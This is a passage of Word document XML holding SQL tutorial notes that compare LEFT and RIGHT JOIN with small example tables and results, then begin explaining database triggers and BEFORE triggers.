            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792F7477"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Query Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C93F1B7"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SELECT * FROM A LEFT JOIN B ON A.id = B.id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42ACD651"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SELECT * FROM A RIGHT JOIN B ON A.id = B.id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46B88DE2" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127F463"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Table 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
        <w:gridCol w:w="592"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="7A8AA1A2" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D75946" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3488AE11" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="436FC6C2" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3367AD6D"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B7505E4"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="15E8A798" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3228CC88"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="623B3EE4"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Mike</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="197221E0"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Table B</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
        <w:gridCol w:w="528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="445D0DBC" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A8A55EE" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="380F7735" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="4EF10EC0" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40E4CB33"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24543E91"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Sales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="4298B058" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10CFBFEF"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D02E1AF"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76B1FB87" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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LEFT JOIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B68E6"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SELECT A.id, A.name, B.dept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C406F6"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FROM A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184BE92E"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LEFT JOIN B ON A.id = B.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333D4D13"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resul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
        <w:gridCol w:w="577"/>
        <w:gridCol w:w="544"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="5423ED1D" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C290B1" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3035B862" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17EF5887" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="15CD1838" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="014C429D"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A422AD"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D3360A"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Sales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="38716B7A" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7826D61C"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04F0F21A"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Mike</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A8481B9"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NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7234F5EB" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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RIGHT JOIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB26F6"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SELECT A.id, A.name, B.dept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A2AF78"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FROM A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C324B0F"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RIGHT JOIN B ON A.id = B.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60766EB1"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resul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
        <w:gridCol w:w="577"/>
        <w:gridCol w:w="528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="612C54D8" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A815A09" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F67EE07" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21234575" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="25563A1B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CBFDD46"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6798BB77"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695CB9F1"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Sales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="2304BCDE" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77FFD255"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C34ED62"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NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05838EAA" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE" w:rsidP="005C1C9E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A823F81" w14:textId="5F04207A"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6E8AD46C">
          <v:rect id="_x0000_i3011" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC76DC" w14:textId="6FB97FDE" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="003C0565">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="731" w:name="_Toc196308211"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are Triggers</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="731"/>
    </w:p>
    <w:p w14:paraId="768C488E" w14:textId="36612168" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>special stored procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically executed (fired)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in response to specific events on a particular table or view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC87448" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="14CD04BE">
          <v:rect id="_x0000_i3012" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B21E25E" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When do Triggers fire?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF625DD" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Triggers execute in response to events such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717508C" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479ECB8" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B0ADD" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5C86B8" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="183B9EC8">
          <v:rect id="_x0000_i3013" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA910CB" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Types of Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF60E51" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BEFORE Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9019B5" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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 xml:space="preserve">Fires </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the triggering event (INSERT/UPDATE/DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C371E41" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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Used for validation or modification of data before it's committed.</w:t>
      </w:r>
    </w:p>
